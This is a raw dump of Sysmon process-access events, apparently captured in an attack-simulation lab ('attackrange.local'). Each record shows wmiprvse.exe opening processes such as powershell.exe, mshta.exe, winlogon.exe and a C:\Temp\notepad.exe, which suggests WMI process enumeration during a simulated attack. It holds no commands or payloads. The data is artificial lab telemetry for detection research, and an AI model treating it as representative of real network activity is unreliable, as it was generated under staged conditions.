16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.796{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 